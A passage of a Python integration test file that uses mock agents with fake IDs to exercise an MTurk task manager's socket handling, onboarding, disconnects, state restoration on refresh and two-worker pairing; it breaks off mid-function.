assert mturk_manager.socket_manager.socket_is_open(connection_id), \
'The socket manager didn\'t open a socket for this agent'
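# Exercises the SocketManager in isolation: alive handling, heartbeat echo,
# message delivery with ack/resend, idempotent channel opening, the
# socket-dead timeout, and the cleanup performed by close_all_channels (after
# which queued packets are silently dropped).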
def test_socket_manager(opt, server_url):
global completed_threads
TEST_MESSAGE = 'This is a test'
task_group_id = TASK_GROUP_ID.format('TEST_SOCKET')
socket_manager = None
world_received_alive = False
world_received_message = False
agent_timed_out = False
def world_on_alive(pkt):
nonlocal world_received_alive
# Assert alive packets contain the right data
worker_id = pkt.data['worker_id']
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
hit_id = pkt.data['hit_id']
assert hit_id == HIT_1_ID, 'HIT id was {}'.format(hit_id)
assign_id = pkt.data['assignment_id']
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
conversation_id = pkt.data['conversation_id']
assert conversation_id == None, \
'Conversation id was {}'.format(conversation_id)
# Start a channel
socket_manager.open_channel(worker_id, assign_id)
# Note that alive was successful
world_received_alive = True
def world_on_new_message(pkt):
nonlocal world_received_message
text = pkt.data['text']
assert text == TEST_MESSAGE, 'Received text was {}'.format(text)
world_received_message = True
def world_on_socket_dead(worker_id, assign_id):
nonlocal agent_timed_out
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
agent_timed_out = True
return True
socket_manager = SocketManager(
server_url,
PORT,
world_on_alive,
world_on_new_message,
world_on_socket_dead,
task_group_id
)
agent_got_response_heartbeat = False
received_messages = 0
did_ack = False
agent = MockAgent(opt, HIT_1_ID, ASSIGN_1_ID, AGENT_1_ID, task_group_id)
connection_id = '{}_{}'.format(AGENT_1_ID, ASSIGN_1_ID)
def agent_on_message(pkt):
nonlocal agent_got_response_heartbeat
nonlocal received_messages
nonlocal agent
if pkt['type'] == Packet.TYPE_HEARTBEAT:
agent_got_response_heartbeat = True
elif pkt['type'] == Packet.TYPE_MESSAGE:
if received_messages != 0:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
received_messages += 1
elif pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
def manager_on_message_ack(pkt):
nonlocal did_ack
did_ack = True
agent.setup_socket(server_url, agent_on_message)
time.sleep(1)
# Wait for socket to open to begin testing
agent.wait_for_alive()
assert socket_manager.socket_is_open(connection_id), \
'Channel was not properly opened for connecting agent'
# send some content from the agent
time.sleep(1)
agent.send_heartbeat()
time.sleep(1)
agent.send_message(TEST_MESSAGE, None)
time.sleep(1)
# Send some content from the socket manager, don't ack the first
# time to ensure that resends work, and ensure the callback is
# eventually called
test_blocking_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
socket_manager.get_my_sender_id(),
AGENT_1_ID,
ASSIGN_1_ID,
'',
None,
True,
True,
manager_on_message_ack
)
# Send packet and wait for it to arrive the first time
socket_manager.queue_packet(test_blocking_packet)
# Wait for socket to open to begin testing
last_time = time.time()
while received_messages == 0:
time.sleep(0.5)
assert time.time() - last_time < 10, \
            'Timed out waiting for server to send message'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_SENT, \
'Packet sent but status never updated'
# wait for resend to occur
time.sleep(2.5)
assert did_ack, 'Socket_manager\'s message ack callback never fired'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_ACK, \
        'Packet received but status never updated'
# Ensure queues are properly set up and that reopening an open socket
# does nothing
assert len(socket_manager.queues) == 1, \
'More queues were opened than expected for the connecting agent'
socket_manager.open_channel(AGENT_1_ID, ASSIGN_1_ID)
assert len(socket_manager.queues) == 1, \
'Second open for the worker was not idempotent'
time.sleep(8.5)
# Ensure all states happened and that the agent eventually disconnected
assert world_received_alive, 'World never received alive message'
assert world_received_message, 'World never received test message'
assert agent_timed_out, 'Agent did not timeout'
assert agent_got_response_heartbeat, 'Agent never got response heartbeat'
# Close channels and move on
socket_manager.close_all_channels()
assert not socket_manager.socket_is_open(connection_id), \
'Channel was not closed with close_all_channels'
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
assert len(socket_manager.queues) == 0, \
'Queues were not cleared on close, {} found'.format(
len(socket_manager.queues)
)
assert len(socket_manager.threads) == 0, \
'Threads were not cleared on close, {} found'.format(
len(socket_manager.threads)
)
# Test to make sure can't send a packet to a closed channel
test_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
AGENT_1_ID,
socket_manager.get_my_sender_id(),
ASSIGN_1_ID,
''
)
socket_manager.queue_packet(test_packet)
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
completed_threads[SOCKET_TEST] = True
def test_solo_with_onboarding(opt, server_url):
"""Tests solo task with onboarding to completion, as well as disconnect in
onboarding to ensure the agent is marked disconnected.
"""
global completed_threads
print('{} Starting'.format(SOLO_ONBOARDING_TEST))
opt['task'] = SOLO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 2)
worker_id = FAKE_WORKER_ID.format(SOLO_ONBOARDING_TEST, 1)
connection_id_1 = '{}_{}'.format(worker_id, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id, assign_id_2)
last_command = None
message_num = 0
expected_messages = [
TestOnboardWorld.TEST_TEXT_1, TestOnboardWorld.TEST_TEXT_2,
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids = [mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_fail = \
MockAgent(opt, hit_id, assign_id_1, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_fail, dummy, dummy, msg_callback)
test_agent_fail.setup_socket(server_url, message_handler)
test_agent_fail.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_fail, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_1]
assign_state = mturk_manager_assign.state
# Run through onboarding, then disconnect and reconnect
test_agent_fail.always_beat = True
test_agent_fail.send_heartbeat()
wait_for_state_time(3, mturk_manager)
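# Conversation ids are prefixed by world type: 'o_' for onboarding, 'w_' for waiting, 't_' for task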
assert test_agent_fail.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent_fail.send_message('Hello1', dummy)
test_agent_fail.always_beat = False
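# Stopping heartbeats simulates the worker disconnecting mid-onboarding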
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
# Refresh the agent
test_agent_fail.conversation_id = None
test_agent_fail.send_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_INACTIVE_HIT, \
'Agent disconnected in onboarding didn\'t get inactive hit'
assert assign_state.status == AssignState.STATUS_DISCONNECT, \
'Disconnected agent not marked as so in state'
assert mturk_manager_assign.disconnected == True, \
'Disconnected agent not marked as so in agent'
# Connect with a new agent and finish onboarding
last_command = None
message_num = 0
test_agent = MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
assert test_agent.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_ONBOARDING)
test_agent.send_message('Hello2', dummy)
wait_for_state_time(4, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
last_time = time.time()
while message_num == 2:
# Wait for manager to catch up
time.sleep(0.2)
assert time.time() - last_time < 10, \
'Timed out waiting for server to acknowledge alive'
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello3', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert mturk_manager_assign.is_in_task(), 'Manager\'s copy of agent is ' \
'not aware that they are in a task, even though the state is'
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello4', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of ' \
'onboarding, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert message_num == 4, 'Not all messages were successfully processed'
completed_threads[SOLO_ONBOARDING_TEST] = True
def test_solo_no_onboarding(opt, server_url):
"""Ensures a solo agent with no onboarding moves directly to a task world
and is able to complete the task and be marked as completed
"""
global completed_threads
print('{} Starting'.format(SOLO_NO_ONBOARDING_TEST))
opt['task'] = SOLO_NO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_NO_ONBOARDING_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
wait_for_state_time(3, mturk_manager)
test_agent.always_beat = False
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[SOLO_NO_ONBOARDING_TEST] = True
def test_solo_refresh_in_middle(opt, server_url):
"""Tests refreshing in the middle of a solo task to make sure state is
properly restored
"""
global completed_threads
print('{} Starting'.format(SOLO_REFRESH_TEST))
opt['task'] = SOLO_REFRESH_TEST
hit_id = FAKE_HIT_ID.format(SOLO_REFRESH_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_REFRESH_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_REFRESH_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
# Simulate a refresh
test_agent.conversation_id = None
test_agent.send_alive()
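# Sending alive with no conversation_id mimics a page refresh; the manager should reply with COMMAND_RESTORE_STATE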
last_time = time.time()
while (last_command.data['text'] != data_model.COMMAND_RESTORE_STATE):
# Wait for the restore state command
time.sleep(1)
assert time.time() - last_time < 10, \
'Timed out waiting for COMMAND_RESTORE_STATE to arrive'
# Check that the restore state had what we expected
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it back to task world'
assert len(last_command.data['messages']) == 1, \
'State restored with more than the 1 message expected, got {}'.format(
len(last_command.data['messages'])
)
assert last_command.data['messages'][0]['text'] == expected_messages[0], \
'Message sent in restore state packet wasn\'t correct'
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
completed_threads[SOLO_REFRESH_TEST] = True
def test_duo_with_onboarding(opt, server_url):
"""Tests a solo task with onboarding to make sure the task doesn't begin
until both agents are ready to go. Also tests that a third agent is not
able to join after the conversation starts, as the HIT should be expired
"""
global completed_threads
print('{} Starting'.format(DUO_ONBOARDING_TEST))
opt['task'] = DUO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 2)
# Repeat worker_id on purpose to test is_sandbox matching of unique workers
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
last_command = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(4, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
wait_for_state_time(2, mturk_manager)
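# The world asks one agent to speak first via COMMAND_SEND_MESSAGE; figure out which one was chosen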
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Attempt to connect with agent 3
assert not mturk_manager.accepting_workers, \
'Manager shouldn\'t still be accepting workers after a conv started'
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
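# A worker connecting after conversations have started should immediately be told to expire its HIT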
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when the agent connected'
# Finish the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_ONBOARDING_TEST] = True
def test_duo_no_onboarding(opt, server_url):
"""Tests duo task to completion, as well as disconnect in
waiting to ensure the agent is marked disconnected and removed from pool.
It also tests disconnect in transitioning to a world to ensure the other
agent returns to waiting
"""
global completed_threads
print('{} Starting'.format(DUO_NO_ONBOARDING_TEST))
opt['task'] = DUO_NO_ONBOARDING_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(DUO_NO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up an agent to disconnect when paired
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
message_handler_3 = make_packet_handler_cant_task(
test_agent_3,
dummy,
dummy,
msg_callback_3
)
test_agent_3.always_beat = True
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
# Start heartbeats for 3
test_agent_3.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not entered into pool'
# create and set up an agent to disconnect when returned to waiting
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal message_num
nonlocal test_agent_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_4.wants_to_send = True
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_4, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats for 4
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
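# Agents 3 and 4 should now be pulled from the pool while the world attempts to start their task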
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when assigned to a world'
check_status(assign_state_3.status, AssignState.STATUS_ASSIGNED)
# Wait for the world to give up on waiting
wait_for_state_time(WORLD_START_TIMEOUT + 2.5, mturk_manager)
# Assert that the agent is back in the waiting world
check_status(assign_state_4.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not returned to the pool'
# Assert that the disconnected agent is marked as so
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_DISCONNECT)
# Wait for 4 to disconnect as well
test_agent_4.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when disconnected'
check_status(assign_state_4.status, AssignState.STATUS_DISCONNECT)
# create and set up the first successful agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
